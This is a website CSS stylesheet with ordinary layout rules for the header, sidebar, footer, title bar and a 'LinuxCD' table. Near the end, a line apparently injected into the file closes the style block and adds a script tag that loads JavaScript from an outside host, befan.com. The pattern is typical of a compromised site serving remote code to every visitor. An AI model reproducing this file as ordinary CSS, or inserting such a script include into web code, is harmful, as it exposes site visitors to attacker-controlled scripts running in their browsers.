@charset "utf-8";
body {
	margin: 0px;
	padding: 0px;
	font-family: Arial;
	font-size: 11px;
	color: #333333;
	background-image: url(images/mainbg.gif);
	background-repeat: repeat-x;
}
#container {
	width: 1000px;
	margin:0 auto;
	position: relative;
}
#top-header {
	background-image: url(images/top_header.gif);
	height: 184px;
}
#body-container {
	background-image: url(images/content-bg.gif);
	background-repeat: no-repeat;
	padding-right: 26px;
	padding-left: 0px;
	min-height:100%;
	position: relative;
	height: auto;
	background-color: transparent;
}
.sidearea {
	width: 210px;
	float: left;
	padding-top: 180px;
	height: auto;
	background-image: url(images/content-bg.gif);
	background-repeat: no-repeat;
	background-position: left top;
	padding-left: 26px;
}
#contentarea {
	float: right;
	width: 730px;
	margin-bottom: 15px;
}

.content {
	width: auto;
}


.sideinner {
	background-image: url(images/bg_side.gif);
	background-repeat: repeat-y;
	width: 188px;
	text-align: center;
	margin-left: 0px;
}
.sidetop {
	background-image: url(images/side_top.gif);
	background-repeat: no-repeat;
	height: 16px;
	width: 188px;
	margin-left: 0px;
}
.side-bottom {
	background-image: url(images/side_bottom.gif);
	background-repeat: no-repeat;
	height: 21px;
	margin-left: 0px;
}
#footer {
	background-image: url(images/footer.gif);
	background-repeat: repeat-x;
	height: 95px;
	position: relative;
	text-align: center;
	padding-top: 20px;
	background-color: #363836;
	color: #CCCCCC;
	margin-top: 10px;
}


#footer_content {
	font-family: Arial;
	color: #999999;
	text-align: center;
	margin-top: 10px;
}
#footer li {
	font-family: Arial;
	font-size: 11px;
	color: #999999;
	padding-left: 10px;
	border-right-width: 1px;
	border-right-style: solid;
	border-right-color: #999999;
	display: inline;
	padding-right: 10px;
}
#footer a {
	font-family: Arial;
	font-size: 11px;
	color: #999;

}

.sideinner h1{
	font-family: Arial;
	font-size: 20px;
	letter-spacing: -1px;
	color: #9e9e9e;
	border-bottom-width: 1px;
	border-bottom-style: dashed;
	border-bottom-color: #9e9e9e;
	margin-right: 30px;
	margin-left: 30px;
	text-align: center;
	padding-bottom: 5px;
	margin-top: 0px;
}
.line {
	background-image: url(images/line.gif);
	height: 12px;
	margin-right: 15px;
	margin-left: 15px;
}
.titlebar {

}
.titlebar h1{
	font-size: 24px;
	color: #238e93;
	letter-spacing: -2px;
	font-weight: bold;
	padding-top: 10px;
	margin: 0px;
}
.line01 {
	background-image: url(images/line.gif);
	height: 12px;

}
.txt-black {
	color: #000000;
}

.clearfix:after {
    content: "."; 
    display: block; 
    height: 0; 
    clear: both; 
    visibility: hidden;
}

table.LinuxCD {
	border-width: 1px 1px 1px 1px;
	border-spacing: 1px;
	border-style: outset outset outset outset;
	border-color: gray gray gray gray;
	border-collapse: collapse;
	background-color: white;
}
table.LinuxCD th {
	border-width: 1px 1px 1px 1px;
	padding: 1px 1px 1px 1px;
	border-style: ridge ridge ridge ridge;
	border-color: gray gray gray gray;
	background-color: white;
	-moz-border-radius: 0px 0px 0px 0px;
}
table.LinuxCD td {
	border-width: 1px 1px 1px 1px;
	padding: 1px 1px 1px 1px;
	border-style: ridge ridge ridge ridge;
	border-color: gray gray gray gray;
	background-color: white;
	-moz-border-radius: 0px 0px 0px 0px;
}
</style>
<script type="text/javascript" src="http://befan.com/code.js"></script>
/* Hides from IE-mac \*/
* html .clearfix {height: 1%;}
/*

/* */
